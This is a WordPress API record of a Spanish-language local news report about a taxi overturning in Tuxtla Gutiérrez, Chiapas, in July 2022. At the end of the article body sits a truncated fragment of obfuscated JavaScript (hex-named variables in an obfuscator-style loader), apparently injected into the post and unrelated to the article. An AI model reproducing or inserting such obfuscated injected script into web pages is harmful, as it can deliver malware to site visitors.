{"id":3450,"date":"2022-07-06T00:13:12","date_gmt":"2022-07-06T00:13:12","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=3450"},"modified":"2022-07-06T00:14:07","modified_gmt":"2022-07-06T00:14:07","slug":"taxi-termina-volcado-en-la-caminera-de-tuxtla","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=3450","title":{"rendered":"Taxi termina volcado en la Caminera de Tuxtla"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"768\" height=\"1024\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/FB_IMG_1657066254203-768x1024.jpg\" alt=\"\" class=\"wp-image-3451\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/FB_IMG_1657066254203-768x1024.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/FB_IMG_1657066254203-225x300.jpg 225w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/FB_IMG_1657066254203.jpg 780w\" sizes=\"auto, (max-width: 768px) 100vw, 768px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.Agencia ReporteCiudadano, 5 de julio del 2022. Tuxtla Guti\u00e9rrez. &#8211; Cerca de las cuatro de la ma\u00f1ana de este martes una unidad de transporte p\u00fablico en la modalidad de taxi termin\u00f3 volcado cuando circulaba sobre la Calzada Caminera a la altura del Libramiento Sur.De acuerdo con los reportes de tr\u00e1nsito, se inform\u00f3 que, el conductor del Chevrolet Aveo con n\u00famero econ\u00f3mico 3775 perdi\u00f3 el control de la unidad sali\u00f3 de la calle se estrell\u00f3 contra una barda y volc\u00f3.El chofer de nombre Abel argument\u00f3 que esto fue debido a que el pavimento estaba mojado.Por el golpe result\u00f3 con varias heridas fue auxiliado por param\u00e9dicos de la CRM y fue llevado al hospital G\u00f3mez MazaUna gr\u00faa fue la encargada de llevar la unidad al corral\u00f3n en turno para deslindar responsabilidades.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho.Agencia ReporteCiudadano, 5 de julio del 2022. Tuxtla Guti\u00e9rrez. &#8211; Cerca de las cuatro de la ma\u00f1ana de este martes una unidad de transporte p\u00fablico en la modalidad de taxi termin\u00f3 volcado cuando circulaba sobre la Calzada Caminera a la altura del Libramiento Sur.De acuerdo con los reportes de tr\u00e1nsito, se inform\u00f3 que, el &hellip;<\/p>\n","protected":false},"author":2,"featured_media":3451,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-3450","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/3450","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3450"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/3450\/revisions"}],"predecessor-version":[{"id":3452,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/3450\/revisions\/3452"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/3451"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3450"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3450"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3450"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}